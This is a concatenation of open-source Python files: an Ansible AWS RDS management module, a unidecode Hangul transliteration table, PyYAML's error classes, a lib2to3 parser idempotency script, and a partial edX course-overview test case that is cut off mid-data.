d['db_subnet_groups'] = db_subnet_groups
if self.instance["VpcSecurityGroups"] is not None:
d['vpc_security_groups'] = ','.join(x['VpcSecurityGroupId'] for x in self.instance['VpcSecurityGroups'])
if "Endpoint" in self.instance and self.instance["Endpoint"] is not None:
d['endpoint'] = self.instance["Endpoint"].get('Address', None)
d['port'] = self.instance["Endpoint"].get('Port', None)
else:
d['endpoint'] = None
d['port'] = None
if self.instance["DBName"]:
d['DBName'] = self.instance['DBName']
return d
class RDSSnapshot:
def __init__(self, snapshot):
self.snapshot = snapshot
self.name = snapshot.id
self.status = snapshot.status
def get_data(self):
d = {
'id': self.name,
'create_time': self.snapshot.snapshot_create_time,
'status': self.status,
'availability_zone': self.snapshot.availability_zone,
'instance_id': self.snapshot.instance_id,
'instance_created': self.snapshot.instance_create_time,
}
# needs boto >= 2.21.0
if hasattr(self.snapshot, 'snapshot_type'):
d["snapshot_type"] = self.snapshot.snapshot_type
if hasattr(self.snapshot, 'iops'):
d["iops"] = self.snapshot.iops
return d
class RDS2Snapshot:
def __init__(self, snapshot):
if 'DeleteDBSnapshotResponse' in snapshot:
self.snapshot = snapshot['DeleteDBSnapshotResponse']['DeleteDBSnapshotResult']['DBSnapshot']
else:
self.snapshot = snapshot
self.name = self.snapshot.get('DBSnapshotIdentifier')
self.status = self.snapshot.get('Status')
def get_data(self):
d = {
'id': self.name,
'create_time': self.snapshot['SnapshotCreateTime'],
'status': self.status,
'availability_zone': self.snapshot['AvailabilityZone'],
'instance_id': self.snapshot['DBInstanceIdentifier'],
'instance_created': self.snapshot['InstanceCreateTime'],
'snapshot_type': self.snapshot['SnapshotType'],
'iops': self.snapshot['Iops'],
}
return d
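# Poll the RDS API until `resource` reaches `status` or the module's wait_timeout
# elapses, backing off between describe calls when we are being throttled.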
def await_resource(conn, resource, status, module):
start_time = time.time()
wait_timeout = module.params.get('wait_timeout') + start_time
check_interval = 5
while wait_timeout > time.time() and resource.status != status:
time.sleep(check_interval)
if wait_timeout <= time.time():
module.fail_json(msg="Timeout waiting for RDS resource %s" % resource.name)
if module.params.get('command') == 'snapshot':
# Temporary until all the rds2 commands have their responses parsed
if resource.name is None:
module.fail_json(msg="There was a problem waiting for RDS snapshot %s" % resource.snapshot)
# Back off if we're getting throttled, since we're just waiting anyway
resource = AWSRetry.backoff(tries=5, delay=20, backoff=1.5)(conn.get_db_snapshot)(resource.name)
else:
# Temporary until all the rds2 commands have their responses parsed
if resource.name is None:
module.fail_json(msg="There was a problem waiting for RDS instance %s" % resource.instance)
# Back off if we're getting throttled, since we're just waiting anyway
resource = AWSRetry.backoff(tries=5, delay=20, backoff=1.5)(conn.get_db_instance)(resource.name)
if resource is None:
break
# Some RDS resources take much longer than others to be ready. Check
# less aggressively for slow ones to avoid throttling.
if time.time() > start_time + 90:
check_interval = 20
return resource
def create_db_instance(module, conn):
required_vars = ['instance_name', 'db_engine', 'size', 'instance_type', 'username', 'password']
valid_vars = ['backup_retention', 'backup_window',
'character_set_name', 'db_name', 'engine_version',
'instance_type', 'iops', 'license_model', 'maint_window',
'multi_zone', 'option_group', 'parameter_group', 'port',
'subnet', 'upgrade', 'zone']
if module.params.get('subnet'):
valid_vars.append('vpc_security_groups')
else:
valid_vars.append('security_groups')
if HAS_RDS2:
valid_vars.extend(['publicly_accessible', 'tags'])
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
result = conn.get_db_instance(instance_name)
if result:
changed = False
else:
try:
result = conn.create_db_instance(instance_name, module.params.get('size'),
module.params.get('instance_type'), module.params.get('db_engine'),
module.params.get('username'), module.params.get('password'), **params)
changed = True
except RDSException as e:
module.fail_json(msg="Failed to create instance: %s" % e.message)
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_instance(instance_name)
module.exit_json(changed=changed, instance=resource.get_data())
def replicate_db_instance(module, conn):
required_vars = ['instance_name', 'source_instance']
valid_vars = ['instance_type', 'port', 'upgrade', 'zone']
if HAS_RDS2:
valid_vars.extend(['iops', 'option_group', 'publicly_accessible', 'tags'])
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
source_instance = module.params.get('source_instance')
result = conn.get_db_instance(instance_name)
if result:
changed = False
else:
try:
result = conn.create_db_instance_read_replica(instance_name, source_instance, **params)
changed = True
except RDSException as e:
module.fail_json(msg="Failed to create replica instance: %s " % e.message)
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_instance(instance_name)
module.exit_json(changed=changed, instance=resource.get_data())
def delete_db_instance_or_snapshot(module, conn):
required_vars = []
valid_vars = ['instance_name', 'snapshot', 'skip_final_snapshot']
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
snapshot = module.params.get('snapshot')
if not instance_name:
result = conn.get_db_snapshot(snapshot)
else:
result = conn.get_db_instance(instance_name)
if not result:
module.exit_json(changed=False)
if result.status == 'deleting':
module.exit_json(changed=False)
try:
if instance_name:
if snapshot:
params["skip_final_snapshot"] = False
if HAS_RDS2:
params["final_db_snapshot_identifier"] = snapshot
else:
params["final_snapshot_id"] = snapshot
else:
params["skip_final_snapshot"] = True
result = conn.delete_db_instance(instance_name, **params)
else:
result = conn.delete_db_snapshot(snapshot)
except RDSException as e:
module.fail_json(msg="Failed to delete instance: %s" % e.message)
# If we're not waiting for a delete to complete then we're all done
# so just return
if not module.params.get('wait'):
module.exit_json(changed=True)
try:
await_resource(conn, result, 'deleted', module)
module.exit_json(changed=True)
except RDSException as e:
if e.code == 'DBInstanceNotFound':
module.exit_json(changed=True)
else:
module.fail_json(msg=e.message)
except Exception as e:
module.fail_json(msg=str(e))
def facts_db_instance_or_snapshot(module, conn):
instance_name = module.params.get('instance_name')
snapshot = module.params.get('snapshot')
if instance_name and snapshot:
module.fail_json(msg="Facts must be called with either instance_name or snapshot, not both")
if instance_name:
resource = conn.get_db_instance(instance_name)
if not resource:
module.fail_json(msg="DB instance %s does not exist" % instance_name)
if snapshot:
resource = conn.get_db_snapshot(snapshot)
if not resource:
module.fail_json(msg="DB snapshot %s does not exist" % snapshot)
module.exit_json(changed=False, instance=resource.get_data())
def modify_db_instance(module, conn):
required_vars = ['instance_name']
valid_vars = ['apply_immediately', 'backup_retention', 'backup_window',
'db_name', 'engine_version', 'instance_type', 'iops', 'license_model',
'maint_window', 'multi_zone', 'new_instance_name',
'option_group', 'parameter_group', 'password', 'size', 'upgrade']
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
new_instance_name = module.params.get('new_instance_name')
try:
result = conn.modify_db_instance(instance_name, **params)
except RDSException as e:
module.fail_json(msg=e.message)
if params.get('apply_immediately'):
if new_instance_name:
# Wait until the new instance name is valid
new_instance = None
while not new_instance:
new_instance = conn.get_db_instance(new_instance_name)
time.sleep(5)
# Found instance but it briefly flicks to available
# before rebooting so let's wait until we see it rebooting
# before we check whether to 'wait'
result = await_resource(conn, new_instance, 'rebooting', module)
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_instance(instance_name)
# guess that this changed the DB, need a way to check
module.exit_json(changed=True, instance=resource.get_data())
def promote_db_instance(module, conn):
required_vars = ['instance_name']
valid_vars = ['backup_retention', 'backup_window']
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
result = conn.get_db_instance(instance_name)
if not result:
module.fail_json(msg="DB Instance %s does not exist" % instance_name)
if result.get_data().get('replication_source'):
try:
result = conn.promote_read_replica(instance_name, **params)
changed = True
except RDSException as e:
module.fail_json(msg=e.message)
else:
changed = False
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_instance(instance_name)
module.exit_json(changed=changed, instance=resource.get_data())
def snapshot_db_instance(module, conn):
required_vars = ['instance_name', 'snapshot']
valid_vars = ['tags']
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
snapshot = module.params.get('snapshot')
changed = False
result = conn.get_db_snapshot(snapshot)
if not result:
try:
result = conn.create_db_snapshot(snapshot, instance_name, **params)
changed = True
except RDSException as e:
module.fail_json(msg=e.message)
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_snapshot(snapshot)
module.exit_json(changed=changed, snapshot=resource.get_data())
def reboot_db_instance(module, conn):
required_vars = ['instance_name']
valid_vars = []
if HAS_RDS2:
valid_vars.append('force_failover')
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
result = conn.get_db_instance(instance_name)
changed = False
try:
result = conn.reboot_db_instance(instance_name, **params)
changed = True
except RDSException as e:
module.fail_json(msg=e.message)
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_instance(instance_name)
module.exit_json(changed=changed, instance=resource.get_data())
def restore_db_instance(module, conn):
required_vars = ['instance_name', 'snapshot']
valid_vars = ['db_name', 'iops', 'license_model', 'multi_zone',
'option_group', 'port', 'publicly_accessible',
'subnet', 'tags', 'upgrade', 'zone']
if HAS_RDS2:
valid_vars.append('instance_type')
else:
required_vars.append('instance_type')
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
instance_type = module.params.get('instance_type')
snapshot = module.params.get('snapshot')
changed = False
result = conn.get_db_instance(instance_name)
if not result:
try:
result = conn.restore_db_instance_from_db_snapshot(instance_name, snapshot, instance_type, **params)
changed = True
except RDSException as e:
module.fail_json(msg=e.message)
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_instance(instance_name)
module.exit_json(changed=changed, instance=resource.get_data())
def validate_parameters(required_vars, valid_vars, module):
command = module.params.get('command')
for v in required_vars:
if not module.params.get(v):
module.fail_json(msg="Parameter %s required for %s command" % (v, command))
# map to convert rds module options to boto rds and rds2 options
optional_params = {
'port': 'port',
'db_name': 'db_name',
'zone': 'availability_zone',
'maint_window': 'preferred_maintenance_window',
'backup_window': 'preferred_backup_window',
'backup_retention': 'backup_retention_period',
'multi_zone': 'multi_az',
'engine_version': 'engine_version',
'upgrade': 'auto_minor_version_upgrade',
'subnet': 'db_subnet_group_name',
'license_model': 'license_model',
'option_group': 'option_group_name',
'size': 'allocated_storage',
'iops': 'iops',
'new_instance_name': 'new_instance_id',
'apply_immediately': 'apply_immediately',
}
# map to convert rds module options to boto rds options
optional_params_rds = {
'db_engine': 'engine',
'password': 'master_password',
'parameter_group': 'param_group',
'instance_type': 'instance_class',
}
# map to convert rds module options to boto rds2 options
optional_params_rds2 = {
'tags': 'tags',
'publicly_accessible': 'publicly_accessible',
'parameter_group': 'db_parameter_group_name',
'character_set_name': 'character_set_name',
'instance_type': 'db_instance_class',
'password': 'master_user_password',
'new_instance_name': 'new_db_instance_identifier',
'force_failover': 'force_failover',
}
if HAS_RDS2:
optional_params.update(optional_params_rds2)
sec_group = 'db_security_groups'
else:
optional_params.update(optional_params_rds)
sec_group = 'security_groups'
# Check for options only supported with rds2
for k in set(optional_params_rds2.keys()) - set(optional_params_rds.keys()):
if module.params.get(k):
module.fail_json(msg="Parameter %s requires boto.rds (boto >= 2.26.0)" % k)
params = {}
for (k, v) in optional_params.items():
if module.params.get(k) is not None and k not in required_vars:
if k in valid_vars:
params[v] = module.params[k]
else:
if module.params.get(k) is False:
pass
else:
module.fail_json(msg="Parameter %s is not valid for %s command" % (k, command))
if module.params.get('security_groups'):
params[sec_group] = module.params.get('security_groups').split(',')
vpc_groups = module.params.get('vpc_security_groups')
if vpc_groups:
if HAS_RDS2:
params['vpc_security_group_ids'] = vpc_groups
else:
groups_list = []
for x in vpc_groups:
groups_list.append(boto.rds.VPCSecurityGroupMembership(vpc_group=x))
params['vpc_security_groups'] = groups_list
# Convert tags dict to list of tuples that rds2 expects
if 'tags' in params:
params['tags'] = module.params['tags'].items()
return params
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
command=dict(choices=['create', 'replicate', 'delete', 'facts', 'modify', 'promote', 'snapshot', 'reboot', 'restore'], required=True),
instance_name=dict(required=False),
source_instance=dict(required=False),
db_engine=dict(choices=['mariadb', 'MySQL', 'oracle-se1', 'oracle-se2', 'oracle-se', 'oracle-ee', 'sqlserver-ee', 'sqlserver-se', 'sqlserver-ex',
'sqlserver-web', 'postgres', 'aurora'], required=False),
size=dict(required=False),
instance_type=dict(aliases=['type'], required=False),
username=dict(required=False),
password=dict(no_log=True, required=False),
db_name=dict(required=False),
engine_version=dict(required=False),
parameter_group=dict(required=False),
license_model=dict(choices=['license-included', 'bring-your-own-license', 'general-public-license', 'postgresql-license'], required=False),
multi_zone=dict(type='bool', required=False),
iops=dict(required=False),
security_groups=dict(required=False),
vpc_security_groups=dict(type='list', required=False),
port=dict(required=False, type='int'),
upgrade=dict(type='bool', default=False),
option_group=dict(required=False),
maint_window=dict(required=False),
backup_window=dict(required=False),
backup_retention=dict(required=False),
zone=dict(aliases=['aws_zone', 'ec2_zone'], required=False),
subnet=dict(required=False),
wait=dict(type='bool', default=False),
wait_timeout=dict(type='int', default=300),
snapshot=dict(required=False),
apply_immediately=dict(type='bool', default=False),
new_instance_name=dict(required=False),
tags=dict(type='dict', required=False),
publicly_accessible=dict(required=False),
character_set_name=dict(required=False),
force_failover=dict(type='bool', required=False, default=False)
)
)
module = AnsibleModule(
argument_spec=argument_spec,
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
invocations = {
'create': create_db_instance,
'replicate': replicate_db_instance,
'delete': delete_db_instance_or_snapshot,
'facts': facts_db_instance_or_snapshot,
'modify': modify_db_instance,
'promote': promote_db_instance,
'snapshot': snapshot_db_instance,
'reboot': reboot_db_instance,
'restore': restore_db_instance,
}
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if not region:
module.fail_json(msg="Region not specified. Unable to determine region from EC2_REGION.")
# set port to per db defaults if not specified
if module.params['port'] is None and module.params['db_engine'] is not None and module.params['command'] == 'create':
if '-' in module.params['db_engine']:
engine = module.params['db_engine'].split('-')[0]
else:
engine = module.params['db_engine']
module.params['port'] = DEFAULT_PORTS[engine.lower()]
# connect to the rds endpoint
if HAS_RDS2:
conn = RDS2Connection(module, region, **aws_connect_params)
else:
conn = RDSConnection(module, region, **aws_connect_params)
invocations[module.params.get('command')](module, conn)
if __name__ == '__main__':
main()
| gpl-3.0 |
SamaraCardoso27/eMakeup | backend/venv/lib/python2.7/site-packages/unidecode/x0d0.py | 253 | 4706 | data = (
'kweon', # 0x00
'kweonj', # 0x01
'kweonh', # 0x02
'kweod', # 0x03
'kweol', # 0x04
'kweolg', # 0x05
'kweolm', # 0x06
'kweolb', # 0x07
'kweols', # 0x08
'kweolt', # 0x09
'kweolp', # 0x0a
'kweolh', # 0x0b
'kweom', # 0x0c
'kweob', # 0x0d
'kweobs', # 0x0e
'kweos', # 0x0f
'kweoss', # 0x10
'kweong', # 0x11
'kweoj', # 0x12
'kweoc', # 0x13
'kweok', # 0x14
'kweot', # 0x15
'kweop', # 0x16
'kweoh', # 0x17
'kwe', # 0x18
'kweg', # 0x19
'kwegg', # 0x1a
'kwegs', # 0x1b
'kwen', # 0x1c
'kwenj', # 0x1d
'kwenh', # 0x1e
'kwed', # 0x1f
'kwel', # 0x20
'kwelg', # 0x21
'kwelm', # 0x22
'kwelb', # 0x23
'kwels', # 0x24
'kwelt', # 0x25
'kwelp', # 0x26
'kwelh', # 0x27
'kwem', # 0x28
'kweb', # 0x29
'kwebs', # 0x2a
'kwes', # 0x2b
'kwess', # 0x2c
'kweng', # 0x2d
'kwej', # 0x2e
'kwec', # 0x2f
'kwek', # 0x30
'kwet', # 0x31
'kwep', # 0x32
'kweh', # 0x33
'kwi', # 0x34
'kwig', # 0x35
'kwigg', # 0x36
'kwigs', # 0x37
'kwin', # 0x38
'kwinj', # 0x39
'kwinh', # 0x3a
'kwid', # 0x3b
'kwil', # 0x3c
'kwilg', # 0x3d
'kwilm', # 0x3e
'kwilb', # 0x3f
'kwils', # 0x40
'kwilt', # 0x41
'kwilp', # 0x42
'kwilh', # 0x43
'kwim', # 0x44
'kwib', # 0x45
'kwibs', # 0x46
'kwis', # 0x47
'kwiss', # 0x48
'kwing', # 0x49
'kwij', # 0x4a
'kwic', # 0x4b
'kwik', # 0x4c
'kwit', # 0x4d
'kwip', # 0x4e
'kwih', # 0x4f
'kyu', # 0x50
'kyug', # 0x51
'kyugg', # 0x52
'kyugs', # 0x53
'kyun', # 0x54
'kyunj', # 0x55
'kyunh', # 0x56
'kyud', # 0x57
'kyul', # 0x58
'kyulg', # 0x59
'kyulm', # 0x5a
'kyulb', # 0x5b
'kyuls', # 0x5c
'kyult', # 0x5d
'kyulp', # 0x5e
'kyulh', # 0x5f
'kyum', # 0x60
'kyub', # 0x61
'kyubs', # 0x62
'kyus', # 0x63
'kyuss', # 0x64
'kyung', # 0x65
'kyuj', # 0x66
'kyuc', # 0x67
'kyuk', # 0x68
'kyut', # 0x69
'kyup', # 0x6a
'kyuh', # 0x6b
'keu', # 0x6c
'keug', # 0x6d
'keugg', # 0x6e
'keugs', # 0x6f
'keun', # 0x70
'keunj', # 0x71
'keunh', # 0x72
'keud', # 0x73
'keul', # 0x74
'keulg', # 0x75
'keulm', # 0x76
'keulb', # 0x77
'keuls', # 0x78
'keult', # 0x79
'keulp', # 0x7a
'keulh', # 0x7b
'keum', # 0x7c
'keub', # 0x7d
'keubs', # 0x7e
'keus', # 0x7f
'keuss', # 0x80
'keung', # 0x81
'keuj', # 0x82
'keuc', # 0x83
'keuk', # 0x84
'keut', # 0x85
'keup', # 0x86
'keuh', # 0x87
'kyi', # 0x88
'kyig', # 0x89
'kyigg', # 0x8a
'kyigs', # 0x8b
'kyin', # 0x8c
'kyinj', # 0x8d
'kyinh', # 0x8e
'kyid', # 0x8f
'kyil', # 0x90
'kyilg', # 0x91
'kyilm', # 0x92
'kyilb', # 0x93
'kyils', # 0x94
'kyilt', # 0x95
'kyilp', # 0x96
'kyilh', # 0x97
'kyim', # 0x98
'kyib', # 0x99
'kyibs', # 0x9a
'kyis', # 0x9b
'kyiss', # 0x9c
'kying', # 0x9d
'kyij', # 0x9e
'kyic', # 0x9f
'kyik', # 0xa0
'kyit', # 0xa1
'kyip', # 0xa2
'kyih', # 0xa3
'ki', # 0xa4
'kig', # 0xa5
'kigg', # 0xa6
'kigs', # 0xa7
'kin', # 0xa8
'kinj', # 0xa9
'kinh', # 0xaa
'kid', # 0xab
'kil', # 0xac
'kilg', # 0xad
'kilm', # 0xae
'kilb', # 0xaf
'kils', # 0xb0
'kilt', # 0xb1
'kilp', # 0xb2
'kilh', # 0xb3
'kim', # 0xb4
'kib', # 0xb5
'kibs', # 0xb6
'kis', # 0xb7
'kiss', # 0xb8
'king', # 0xb9
'kij', # 0xba
'kic', # 0xbb
'kik', # 0xbc
'kit', # 0xbd
'kip', # 0xbe
'kih', # 0xbf
'ta', # 0xc0
'tag', # 0xc1
'tagg', # 0xc2
'tags', # 0xc3
'tan', # 0xc4
'tanj', # 0xc5
'tanh', # 0xc6
'tad', # 0xc7
'tal', # 0xc8
'talg', # 0xc9
'talm', # 0xca
'talb', # 0xcb
'tals', # 0xcc
'talt', # 0xcd
'talp', # 0xce
'talh', # 0xcf
'tam', # 0xd0
'tab', # 0xd1
'tabs', # 0xd2
'tas', # 0xd3
'tass', # 0xd4
'tang', # 0xd5
'taj', # 0xd6
'tac', # 0xd7
'tak', # 0xd8
'tat', # 0xd9
'tap', # 0xda
'tah', # 0xdb
'tae', # 0xdc
'taeg', # 0xdd
'taegg', # 0xde
'taegs', # 0xdf
'taen', # 0xe0
'taenj', # 0xe1
'taenh', # 0xe2
'taed', # 0xe3
'tael', # 0xe4
'taelg', # 0xe5
'taelm', # 0xe6
'taelb', # 0xe7
'taels', # 0xe8
'taelt', # 0xe9
'taelp', # 0xea
'taelh', # 0xeb
'taem', # 0xec
'taeb', # 0xed
'taebs', # 0xee
'taes', # 0xef
'taess', # 0xf0
'taeng', # 0xf1
'taej', # 0xf2
'taec', # 0xf3
'taek', # 0xf4
'taet', # 0xf5
'taep', # 0xf6
'taeh', # 0xf7
'tya', # 0xf8
'tyag', # 0xf9
'tyagg', # 0xfa
'tyags', # 0xfb
'tyan', # 0xfc
'tyanj', # 0xfd
'tyanh', # 0xfe
'tyad', # 0xff
)
| mit |
spywhere/Testful | yaml/error.py | 294 | 2533 |
__all__ = ['Mark', 'YAMLError', 'MarkedYAMLError']
class Mark:
def __init__(self, name, index, line, column, buffer, pointer):
self.name = name
self.index = index
self.line = line
self.column = column
self.buffer = buffer
self.pointer = pointer
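    # Build a one-line excerpt of the buffer around the pointer, eliding long
    # lines with ' ... ' and adding a second line with a '^' caret under the
    # offending column.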
def get_snippet(self, indent=4, max_length=75):
if self.buffer is None:
return None
head = ''
start = self.pointer
while start > 0 and self.buffer[start-1] not in '\0\r\n\x85\u2028\u2029':
start -= 1
if self.pointer-start > max_length/2-1:
head = ' ... '
start += 5
break
tail = ''
end = self.pointer
while end < len(self.buffer) and self.buffer[end] not in '\0\r\n\x85\u2028\u2029':
end += 1
if end-self.pointer > max_length/2-1:
tail = ' ... '
end -= 5
break
snippet = self.buffer[start:end]
return ' '*indent + head + snippet + tail + '\n' \
+ ' '*(indent+self.pointer-start+len(head)) + '^'
def __str__(self):
snippet = self.get_snippet()
where = " in \"%s\", line %d, column %d" \
% (self.name, self.line+1, self.column+1)
if snippet is not None:
where += ":\n"+snippet
return where
class YAMLError(Exception):
pass
class MarkedYAMLError(YAMLError):
def __init__(self, context=None, context_mark=None,
problem=None, problem_mark=None, note=None):
self.context = context
self.context_mark = context_mark
self.problem = problem
self.problem_mark = problem_mark
self.note = note
def __str__(self):
lines = []
if self.context is not None:
lines.append(self.context)
if self.context_mark is not None \
and (self.problem is None or self.problem_mark is None
or self.context_mark.name != self.problem_mark.name
or self.context_mark.line != self.problem_mark.line
or self.context_mark.column != self.problem_mark.column):
lines.append(str(self.context_mark))
if self.problem is not None:
lines.append(self.problem)
if self.problem_mark is not None:
lines.append(str(self.problem_mark))
if self.note is not None:
lines.append(self.note)
return '\n'.join(lines)
| mit |
bhargav2408/python-for-android | python3-alpha/python3-src/Lib/lib2to3/tests/pytree_idempotency.py | 56 | 2405 | #!/usr/bin/env python3
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Main program for testing the infrastructure."""
__author__ = "Guido van Rossum <guido@python.org>"
# Support imports (need to be imported first)
from . import support
# Python imports
import os
import sys
import logging
# Local imports
from .. import pytree
import pgen2
from pgen2 import driver
logging.basicConfig()
def main():
gr = driver.load_grammar("Grammar.txt")
dr = driver.Driver(gr, convert=pytree.convert)
fn = "example.py"
tree = dr.parse_file(fn, debug=True)
if not diff(fn, tree):
print("No diffs.")
if not sys.argv[1:]:
return # Pass a dummy argument to run the complete test suite below
problems = []
# Process every imported module
for name in sys.modules:
mod = sys.modules[name]
if mod is None or not hasattr(mod, "__file__"):
continue
fn = mod.__file__
if fn.endswith(".pyc"):
fn = fn[:-1]
if not fn.endswith(".py"):
continue
print("Parsing", fn, file=sys.stderr)
tree = dr.parse_file(fn, debug=True)
if diff(fn, tree):
problems.append(fn)
# Process every single module on sys.path (but not in packages)
for dir in sys.path:
try:
names = os.listdir(dir)
except os.error:
continue
print("Scanning", dir, "...", file=sys.stderr)
for name in names:
if not name.endswith(".py"):
continue
print("Parsing", name, file=sys.stderr)
fn = os.path.join(dir, name)
try:
tree = dr.parse_file(fn, debug=True)
except pgen2.parse.ParseError as err:
print("ParseError:", err)
else:
if diff(fn, tree):
problems.append(fn)
# Show summary of problem files
if not problems:
print("No problems. Congratulations!")
else:
print("Problems in following files:")
for fn in problems:
print("***", fn)
def diff(fn, tree):
f = open("@", "w")
try:
f.write(str(tree))
finally:
f.close()
try:
return os.system("diff -u %s @" % fn)
finally:
os.remove("@")
if __name__ == "__main__":
main()
| apache-2.0 |
ak2703/edx-platform | openedx/core/djangoapps/content/course_overviews/tests.py | 5 | 15602 | """
Tests for course_overviews app.
"""
import datetime
import ddt
import itertools
import pytz
import math
import mock
from django.utils import timezone
from lms.djangoapps.certificates.api import get_active_web_certificate
from lms.djangoapps.courseware.courses import course_image_url
from xmodule.course_metadata_utils import DEFAULT_START_DATE
from xmodule.error_module import ErrorDescriptor
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, check_mongo_calls, check_mongo_calls_range
from .models import CourseOverview
@ddt.ddt
class CourseOverviewTestCase(ModuleStoreTestCase):
"""
Tests for CourseOverviewDescriptor model.
"""
TODAY = timezone.now()
LAST_MONTH = TODAY - datetime.timedelta(days=30)
LAST_WEEK = TODAY - datetime.timedelta(days=7)
NEXT_WEEK = TODAY + datetime.timedelta(days=7)
NEXT_MONTH = TODAY + datetime.timedelta(days=30)
def check_course_overview_against_course(self, course):
"""
Compares a CourseOverview object against its corresponding
CourseDescriptor object.
Specifically, given a course, test that data within the following three
objects match each other:
- the CourseDescriptor itself
- a CourseOverview that was newly constructed from _create_from_course
- a CourseOverview that was loaded from the MySQL database
Arguments:
course (CourseDescriptor): the course to be checked.
"""
def get_seconds_since_epoch(date_time):
"""
Returns the number of seconds between the Unix Epoch and the given
datetime. If the given datetime is None, return None.
Arguments:
date_time (datetime): the datetime in question.
"""
if date_time is None:
return None
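            # Example: a datetime one minute after the Unix epoch yields 60.0 here.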
epoch = datetime.datetime.utcfromtimestamp(0).replace(tzinfo=pytz.utc)
return math.floor((date_time - epoch).total_seconds())
# Load the CourseOverview from the cache twice. The first load will be a cache miss (because the cache
# is empty) so the course will be newly created with CourseOverviewDescriptor.create_from_course. The second
# load will be a cache hit, so the course will be loaded from the cache.
course_overview_cache_miss = CourseOverview.get_from_id(course.id)
course_overview_cache_hit = CourseOverview.get_from_id(course.id)
# Test if value of these attributes match between the three objects
fields_to_test = [
'id',
'display_name',
'display_number_with_default',
'display_org_with_default',
'advertised_start',
'facebook_url',
'social_sharing_url',
'certificates_display_behavior',
'certificates_show_before_end',
'cert_name_short',
'cert_name_long',
'lowest_passing_grade',
'end_of_course_survey_url',
'mobile_available',
'visible_to_staff_only',
'location',
'number',
'url_name',
'display_name_with_default',
'start_date_is_still_default',
'pre_requisite_courses',
'enrollment_domain',
'invitation_only',
'max_student_enrollments_allowed',
]
for attribute_name in fields_to_test:
course_value = getattr(course, attribute_name)
cache_miss_value = getattr(course_overview_cache_miss, attribute_name)
cache_hit_value = getattr(course_overview_cache_hit, attribute_name)
self.assertEqual(course_value, cache_miss_value)
self.assertEqual(cache_miss_value, cache_hit_value)
# Test if return values for all methods are equal between the three objects
methods_to_test = [
('clean_id', ()),
('clean_id', ('#',)),
('has_ended', ()),
('has_started', ()),
('start_datetime_text', ('SHORT_DATE',)),
('start_datetime_text', ('DATE_TIME',)),
('end_datetime_text', ('SHORT_DATE',)),
('end_datetime_text', ('DATE_TIME',)),
('may_certify', ()),
]
for method_name, method_args in methods_to_test:
course_value = getattr(course, method_name)(*method_args)
cache_miss_value = getattr(course_overview_cache_miss, method_name)(*method_args)
cache_hit_value = getattr(course_overview_cache_hit, method_name)(*method_args)
self.assertEqual(course_value, cache_miss_value)
self.assertEqual(cache_miss_value, cache_hit_value)
# Other values to test
# Note: we test the start and end attributes here instead of in
# fields_to_test, because I ran into trouble while testing datetimes
# for equality. When writing and reading dates from databases, the
# resulting values are often off by fractions of a second. So, as a
# workaround, we simply test if the start and end times are the same
# number of seconds from the Unix epoch.
others_to_test = [
(
course_image_url(course),
course_overview_cache_miss.course_image_url,
course_overview_cache_hit.course_image_url
),
(
get_active_web_certificate(course) is not None,
course_overview_cache_miss.has_any_active_web_certificate,
course_overview_cache_hit.has_any_active_web_certificate
),
(
get_seconds_since_epoch(course.start),
get_seconds_since_epoch(course_overview_cache_miss.start),
get_seconds_since_epoch(course_overview_cache_hit.start),
),
(
get_seconds_since_epoch(course.end),
get_seconds_since_epoch(course_overview_cache_miss.end),
get_seconds_since_epoch(course_overview_cache_hit.end),
),
(
get_seconds_since_epoch(course.enrollment_start),
get_seconds_since_epoch(course_overview_cache_miss.enrollment_start),
get_seconds_since_epoch(course_overview_cache_hit.enrollment_start),
),
(
get_seconds_since_epoch(course.enrollment_end),
get_seconds_since_epoch(course_overview_cache_miss.enrollment_end),
get_seconds_since_epoch(course_overview_cache_hit.enrollment_end),
),
]
for (course_value, cache_miss_value, cache_hit_value) in others_to_test:
self.assertEqual(course_value, cache_miss_value)
self.assertEqual(cache_miss_value, cache_hit_value)
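    # Illustrative sketch (not part of the original test): the epoch-seconds
    # workaround above exists because datetimes that round-trip through a
    # database can drift by fractions of a second. The values below are
    # examples only, added for clarity.
    @staticmethod
    def _seconds_since_epoch_example():
        """Example only: two datetimes 250ms apart floor to the same epoch second."""
        import datetime
        import math
        import pytz
        epoch = datetime.datetime.utcfromtimestamp(0).replace(tzinfo=pytz.utc)
        t1 = datetime.datetime(2015, 1, 1, 12, 0, 0, 0, tzinfo=pytz.utc)
        t2 = t1 + datetime.timedelta(microseconds=250000)  # simulated sub-second drift
        assert math.floor((t1 - epoch).total_seconds()) == math.floor((t2 - epoch).total_seconds())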
@ddt.data(*itertools.product(
[
{
"display_name": "Test Course", # Display name provided
"start": LAST_WEEK, # In the middle of the course
"end": NEXT_WEEK,
"advertised_start": "2015-01-01 11:22:33", # Parse-able advertised_start
"pre_requisite_courses": [ # Has pre-requisites
'course-v1://edX+test1+run1',
'course-v1://edX+test2+run1'
],
"static_asset_path": "/my/abs/path", # Absolute path
"certificates_show_before_end": True,
},
{
"display_name": "", # Empty display name
"start": NEXT_WEEK, # Course hasn't started yet
